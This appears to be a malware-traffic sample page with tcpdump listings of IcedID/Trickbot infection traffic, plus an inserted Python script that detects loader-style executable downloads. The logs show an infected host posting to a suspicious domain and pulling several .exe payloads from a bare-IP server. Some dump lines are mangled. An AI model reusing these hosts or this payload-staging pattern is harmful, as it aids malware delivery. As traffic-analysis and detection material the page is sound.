2019-07-29 13:00:59.699454 IP 10.7.29.101.49259 > 58.64.191.148.80: Flags [.], ack 1, win 64240, length 0
E..(.p@…..
..e:@…k.P….(.EXP…….
2019-07-29 13:00:59.699544 IP 10.7.29.101.49259 > 58.64.191.148.80: Flags [P.], seq 1:756, ack 1, win 64240, length 755: HTTP: POST / HTTP/1.1
E….q@….+
..e:@…k.P….(.EXP…….POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 520
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.vitaindu.com
Cache-Control: no-cache

2019-07-29 13:00:59.699603 IP 58.64.191.148.80 > 10.7.29.101.49259: Flags [.], ack 756, win 64240, length 0
E..(……h.:@..
..e.P.k(.EX….P…….
2019-07-29 13:00:59.782318 IP 172.16.5.2.53 > 10.7.29.101.58389: 12756 1/2/2 A 210.140.73.39 (142)
E……………
..e.5….O.1…………www.ex-olive.com……………….I’………….ns01.telewave.ad.jp…………..ns01.epressd.O._…………JR.>………..z.2
2019-07-29 13:00:59.783153 IP 10.7.29.101.49262 > 210.140.73.39.80: Flags [S], seq 3843601751, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.r@….2
..e..I’.n.P…W…… ……………..
2019-07-29 13:00:59.819475 IP 157.7.107.91.80 > 10.7.29.101.49255: Flags [P.], seq 13821:15203, ack 811, win 64240, length 1382: HTTP
E………T…k[
..e.P.g)…..NSP…….2.528c.494-.542.973-1.114 1.5-1.716.449-.544.869-1.111 1.257-1.7l.15-.226c.329-.481.659-.983.988-1.505.329-.522.599-.963.808-1.324l.4-.692c1.607-2.889 2.963-5.91 4.055-9.03 2.459-7.089 3.861-14.502 4.16-22 0-.773.03-1.556.09-2.348 7.811 2.273 17.1 5.433 20.726 8.157 2.257 2 4.155 19.52 5.427 42.428h3.666c-1.332-21.91-3.381-42.477-7.013-45.182-4.658-3.512-16.387-7.25-24.858-9.593l-8.558-4.257c-.674-.339-1.488-.219-2.035.3l-5.791 5.523-4.25 4.034-4.19-4.079-5.731-5.569c-.54-.53-1.355-.662-2.035-.331l-8.784 4.289c-8.47 2.273-20.022 5.87-24.646 9.286-3.685 2.715-5.645 23.414-6.68 45.574h3.652zm57.856-53.069l.628-.783.284-.271 1.18-1.128.254.12 3.906 1.957 2.918 1.5v.135l-4.744 12.04-8.694-5.794-2.32-1.5 6.588-6.276zm-28.013 1.159l2.993-1.5 3.846-1.881.21-.06.09.075 1.407 1.37h.075l.569.557 6.51 6.366-2.245 1.5-8.829 5.779-4.621-12.04-.005-.166zm2.14 15.577c.194.505.606.894 1.12 1.061.514.167 1.076.092 1.529-.203l10.475-6.893 3.292-2.152 3.307 2.243 10.475 6.923c.45.303 1.013.386 1.53.225.518-.161.935-.548 1.134-1.053l1.766-4.515c-.686 4.963-1.905 9.837-3.636 14.539-.932 2.49-2.053 4.905-3.352 7.224l-.389.662-.7 1.174c-.359.572-.718 1.1-1.062 1.61l-.21.3c-.344.5-.7.963-1.047 1.4l-.434.527c-.344.406-.673.8-1.018 1.159-.689.743-1.429 1.436-2.215 2.075h-8.863c-.765-.637-1.485-1.326-2.155-2.062-.359-.391-.7-.8-1.062-1.249l-.374-.452c-.359-.467-.733-.963-1.092-1.505l-.1
2019-07-29 13:00:59.819587 IP 10.7.29.101.49255 > 157.7.107.91.80: Flags [.], ack 15203, win 62858, length 0
E..(.s@…..
..e..k[.g.P..NS)..%P….B..
2019-07-29 13:00:59.820412 IP 157.7.107.91.80 > 10.7.29.101.49255: Flags [P.], seq 15203:16585, ack 811, win 64240, length 1382: HTTP
E………T…k[
..e.P.g)..%..NSP…….5-.226c-.374-.542-.733-1.1-1.107-1.7l-.434-.722c-.209-.346-.418-.707-.629-1.084-1.273-2.322-2.369-4.737-3.277-7.224-1.852-5.166-3.093-10.53-3.7-15.984l2.278 5.902zm49.653 36.333l.1-25.993c.016-.483-.162-.953-.494-1.305-.331-.351-.79-.553-1.272-.561-.239-.011-.478.03-.7.12-.678.284-1.115.951-1.107 1.686v26.053h3.473zm-36.288-26.189c.328 1.337 1.526 2.277 2.903 2.277s2.575-.94 2.903-2.277c.157-.858-.076-1.741-.636-2.409-.558-.666-1.384-1.047-2.253-1.038l.075.015c-.885-.038-1.74.328-2.322.996-.582.668-.829 1.564-.67 2.436zm2.946 6.2v.015c-.968-.014-1.88.452-2.437 1.244-.556.792-.685 1.808-.343 2.714.456 1.128 1.552 1.867 2.769 1.867s2.313-.739 2.769-1.867c.058-.152.103-.308.13:

IcedID Iced ID and Trickbot Banking Malware Trojan Downloader Dropper PCAP file download traffic sample

2019-08-12 14:04:16.655885 IP 10.8.12.101.49224 > 179.60.144.143.443: Flags [P.], seq 1:119, ack 1, win 64240, length 118
E…. @…..
..e.<…H…4E…D.P…E…….q…m..]Q. k…,..V…kl…k…..$….!…./.5… ….. . .2.8…….,…………..wrotection.pro. …………..
2019-08-12 14:04:16.655968 IP 179.60.144.143.443 > 10.8.12.101.49224: Flags [.], ack 119, win 64240, length 0
E..(. …..v.<..
..e…H..D..4FWP….2..
2019-08-12 14:04:16.841099 IP 179.60.144.143.443 > 10.8.12.101.49224: Flags [P.], seq 1:810, ack 119, win 64240, length 809
E..Q.!…..L.<..
..e…H..D..4FWP………..Q…M……W……g…:…p…../.*…Z …m….s.G.Z..sN6~.._.d..V=.._a./…………………..0…0.. …… ..d…..&0.. *.H……..0s1.0 ..U….US1.0 ..U….NJ1.0…U.
..belles fogginess’s1.0…U….introversion’s cashier1.0…U….indecisively.org0…190630040001Z..200629040001Z0s1.0 ..U….US1.0 ..U….NJ1.0…U.
..belles fogginess’s1.0…U….introversion’s cashier1.0…U….indecisively.org0..0.. .H…………0……..Q…X.)t5X…..5..}}..7..5……..[……#…5.....H...$..|Z4.....QB}S.......u.pJh.../6h.......IC....o.H.3.{............/b........S0Q0...U......|{..q..nb......f.AP.0...U.#..0...|{..q..nb......f.AP.0...U.......0....0.. *.H.............3.A....7Z;.E.V....A..m..B.d..H......j..N[.P?..aQ....N...k..D..............v4.fk.L. kwr.:.U..[@.j...{~f..+Hg.........."n…………….

2019-08-12 14:04:22.653444 IP 10.8.12.101.49226 > 107.173.90.141.80: Flags [P.], seq 1:79, ack 1, win 64240, length 78: HTTP: GET /SWKLPFVBDS.exe HTTP/1.1
E..v.:@…..
..ek.Z..J.P…/e..&P….i..GET /SWKLPFVBDS.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.653480 IP 107.173.90.141.80 > 10.8.12.101.49226: Flags [.], ack 79, win 64240, length 0
E..(.V….^.k.Z.
..e.P.Je..&…}P…….
2019-08-12 14:04:22.653825 IP 107.173.90.141.80 > 10.8.12.101.49227: Flags [S.], seq 1652259580, ack 1389350972, win 64240, options [mss 1460], length 0
E..,.W….^.k.Z.
..e.P.Kb{z.R..<`….^……
2019-08-12 14:04:22.653923 IP 10.8.12.101.49227 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
E..(.;@…..
..ek.Z..K.PR.. 107.173.90.141.80: Flags [P.], seq 1:74, ack 1, win 64240, length 73: HTTP: GET /Tin64.exe HTTP/1.1
E..q.<@…..
..ek.Z..K.PR..<b{z.P…=!..GET /Tin64.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.654025 IP 107.173.90.141.80 > 10.8.12.101.49227: Flags [.], ack 74, win 64240, length 0
E..(.X….^.k.Z.
..e.P.Kb{z.R…P…….
2019-08-12 14:04:22.658025 IP 107.173.90.141.80 > 10.8.12.101.49228: Flags [S.], seq 848954188, ack 3386416125, win 64240, options [mss 1460], length 0
E..,.Y….^.k.Z.
..e.P.L2..L….`…d%……
2019-08-12 14:04:22.658306 IP 10.8.12.101.49228 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
E..(.=@…..
..ek.Z..L.P….2..MP…{…
2019-08-12 14:04:22.658387 IP 10.8.12.101.49228 > 107.173.90.141.80: Flags [P.], seq 1:72, ack 1, win 64240, length 71: HTTP: GET /tin.exe HTTP/1.1
E..o.>@…..
..ek.Z..L.P….2..MP…….GET /tin.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.658419 IP 107.173.90.141.80 > 10.8.12.101.49228: Flags [.], ack 72, win 64240, length 0
2019-08-12 14:04:22.658818 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [S.], seq 2043162382, ack 4219249562, win 64240, options [mss 1460], length 0
2019-08-12 14:04:22.658925 IP 10.8.12.101.49229 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
2019-08-12 14:04:22.659036 IP 10.8.12.101.49229 > 107.173.90.141.80: Flags [P.], seq 1:74, ack 1, win 64240, length 73: HTTP: GET /Tin86.exe HTTP/1.1
GET /Tin86.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.783970 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [.], seq 21901:23361, ack 74, win 64240, length 1460: HTTP
[payload: 1460 bytes of the Tin86.exe response body, mostly binary; readable strings: "CWindowDock Demo – Child 2", "CWindowDock Demo – Child 1", "CWindowDock Demo – Parent", "Fa7b$~m?aEdng?hWoWA$Q0?1#7~fcD9h5k.1M@ijUEYlfckR2", followed by base64-like text]
2019-08-12 14:04:22.783982 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [.], seq 23361:24821, ack 74, win 64240, length 1460: HTTP
[payload: 1460 bytes, a continuation of the base64-like text from the previous segment]
2019-08-12 14:04:22.783983 IP 10.8.12.101.49227 > 107.173.90.141.80: Flags [.], ack 32121, win 64240, length 0
2019-08-12 14:04:22.783993 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [P.], seq 24821:26281, ack 74, win 64240, length 1460: HTTP
[payload: 1460 bytes of binary data; the dump is truncated in the source]
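
The four requests to 107.173.90.141 above share a shape worth detecting: several executables fetched within the same second, each on its own TCP connection, from a bare-IP Host with no User-Agent header. The following is an added example, not part of this feed's listing: a small Python detector that parses tcpdump-style output of this kind and reports both per-request indicators and the multi-file burst. The sample lines are constructed from the listing (the timestamp on the Tin64.exe request is not legible on the page and is filled in with a plausible value here, and a benign request is added for contrast); the time window, file count and extension list are assumptions, not feed rules.

```python
"""Flag loader-style executable downloads in tcpdump-style HTTP listings.

Added example, not code from the original page. Heuristics:
  * request path ends in an executable extension (assumed list below)
  * Host header is a bare IP address
  * no User-Agent header at all
  * burst: one client pulls several distinct executables from one server
    within WINDOW_SECONDS (assumed threshold)
"""
import re
import ipaddress
from datetime import datetime
from collections import defaultdict

# "tcpdump -nn" header line with an HTTP request summary at the end.
HEADER_RE = re.compile(
    r'^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+) IP '
    r'(?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+): '
    r'.*?HTTP: (?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01]$'
)
HDR_RE = re.compile(r'^([\w-]+):\s*(.*)$')
EXEC_EXT = ('.exe', '.dll', '.scr')   # assumption: extensions worth flagging
WINDOW_SECONDS = 5.0                   # assumption: burst window
MIN_EXES = 2                           # assumption: distinct files per burst

# Constructed sample, built from the listing above; Tin64.exe timestamp is
# not legible on the page and is filled in here; the last request is benign.
SAMPLE = """\
2019-08-12 14:04:22.653444 IP 10.8.12.101.49226 > 107.173.90.141.80: Flags [P.], seq 1:79, ack 1, win 64240, length 78: HTTP: GET /SWKLPFVBDS.exe HTTP/1.1
GET /SWKLPFVBDS.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.653480 IP 107.173.90.141.80 > 10.8.12.101.49226: Flags [.], ack 79, win 64240, length 0
2019-08-12 14:04:22.653990 IP 10.8.12.101.49227 > 107.173.90.141.80: Flags [P.], seq 1:74, ack 1, win 64240, length 73: HTTP: GET /Tin64.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.658387 IP 10.8.12.101.49228 > 107.173.90.141.80: Flags [P.], seq 1:72, ack 1, win 64240, length 71: HTTP: GET /tin.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.659036 IP 10.8.12.101.49229 > 107.173.90.141.80: Flags [P.], seq 1:74, ack 1, win 64240, length 73: HTTP: GET /Tin86.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:05:01.000000 IP 10.8.12.101.49230 > 93.184.216.34.80: Flags [P.], seq 1:120, ack 1, win 64240, length 119: HTTP: GET /index.html HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
"""


def parse_requests(text):
    """Return one dict per HTTP request, with the header lines that follow it.

    Header lines belong to the preceding request until a blank line or the
    next packet line; hex/ASCII dump lines never match HDR_RE and are skipped.
    """
    reqs, current = [], None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            current = {
                'ts': datetime.strptime(m['ts'], '%Y-%m-%d %H:%M:%S.%f'),
                'src': m['src'], 'sport': int(m['sport']),
                'dst': m['dst'], 'dport': int(m['dport']),
                'method': m['method'], 'path': m['path'], 'headers': {},
            }
            reqs.append(current)
            continue
        if not line.strip() or (line.startswith('20') and ' IP ' in line):
            current = None          # blank line or non-HTTP packet ends the block
            continue
        h = HDR_RE.match(line)
        if current is not None and h:
            current['headers'][h.group(1).lower()] = h.group(2)
    return reqs


def is_bare_ip(host):
    """True when the Host header value is an IP literal rather than a name."""
    try:
        ipaddress.ip_address(host.split(':')[0])
        return True
    except ValueError:
        return False


def score_request(r):
    """Reasons a single request looks like a loader fetch (empty if none)."""
    reasons = []
    if r['path'].lower().endswith(EXEC_EXT):
        reasons.append('executable path')
    host = r['headers'].get('host', '')
    if host and is_bare_ip(host):
        reasons.append('bare-IP Host header')
    if 'user-agent' not in r['headers']:
        reasons.append('no User-Agent')
    return reasons


def detect(text, window_seconds=WINDOW_SECONDS, min_exes=MIN_EXES):
    """Per-request findings plus one burst finding per client/server pair."""
    findings, by_pair = [], defaultdict(list)
    for r in parse_requests(text):
        reasons = score_request(r)
        if reasons:
            findings.append({'ts': r['ts'], 'dst': r['dst'],
                             'path': r['path'], 'reasons': reasons})
        if 'executable path' in reasons:
            by_pair[(r['src'], r['dst'])].append(r)
    for (src, dst), rs in by_pair.items():
        rs.sort(key=lambda x: x['ts'])
        for i, first in enumerate(rs):   # sliding window over exe fetches
            group = [x for x in rs[i:]
                     if (x['ts'] - first['ts']).total_seconds() <= window_seconds]
            paths = {x['path'] for x in group}
            if len(paths) >= min_exes:
                findings.append({'burst': True, 'src': src, 'dst': dst,
                                 'paths': sorted(paths),
                                 'connections': len({x['sport'] for x in group})})
                break
    return findings


if __name__ == '__main__':
    for f in detect(SAMPLE):
        print(f)
```

Each executable fetch in the sample is reported three times over (executable path, bare-IP Host, no User-Agent), and the pair 10.8.12.101 / 107.173.90.141 produces one burst finding covering four distinct files on four source ports; the benign example.com request produces nothing. On real tcpdump output the hex/ASCII dump lines are ignored because they never match the header pattern.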

2019-08-12 14:14:56.835089 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [P.], seq 4809:6269, ack 1931, win 65535, length 1460
[payload: 1460 bytes of binary data on port 443, rendered as dots in this listing]
2019-08-12 14:14:56.835150 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [.], ack 6269, win 64240, length 0
2019-08-12 14:14:56.835172 IP 10.8.12.2.60172 > 185.70.40.151.443: Flags [.], ack 6825, win 65535, length 0
2019-08-12 14:14:56.835251 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [P.], seq 6269:6896, ack 1931, win 65535, length 627
[payload: 627 bytes of binary data on port 443]
2019-08-12 14:14:56.835276 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [.], ack 6896, win 64240, length 0
2019-08-12 14:14:57.185963 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [FP.], seq 1931, ack 6896, win 64240, length 0
2019-08-12 14:14:57.186113 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [.], ack 1932, win 65535, length 0
2019-08-12 14:14:57.186214 IP 10.8.12.2.60172 > 185.70.40.151.443: Flags [F.], seq 1905, ack 6825, win 65535, length 0
2019-08-12 14:14:57.186317 IP 185.70.40.151.443 > 10.8.12.2.60172: Flags [.], ack 1906, win 64239, length 0
2019-08-12 14:14:57.331011 IP 185.183.96.213.443 > 10.8.12.2.59830: Flags [P.], seq 782:827, ack 80, win 64240, length 45
[payload: 45 bytes, mostly binary; readable string: "18FC78E29C1478DA645838C4DD2B2195"]
2019-08-12 14:14:57.331471 IP 10.8.12.2.60174 > 185.183.96.213.443: Flags [S], seq 1476129128, win 65535, options [mss 1460,nop,wscale 4,nop,nop,sackOK], length 0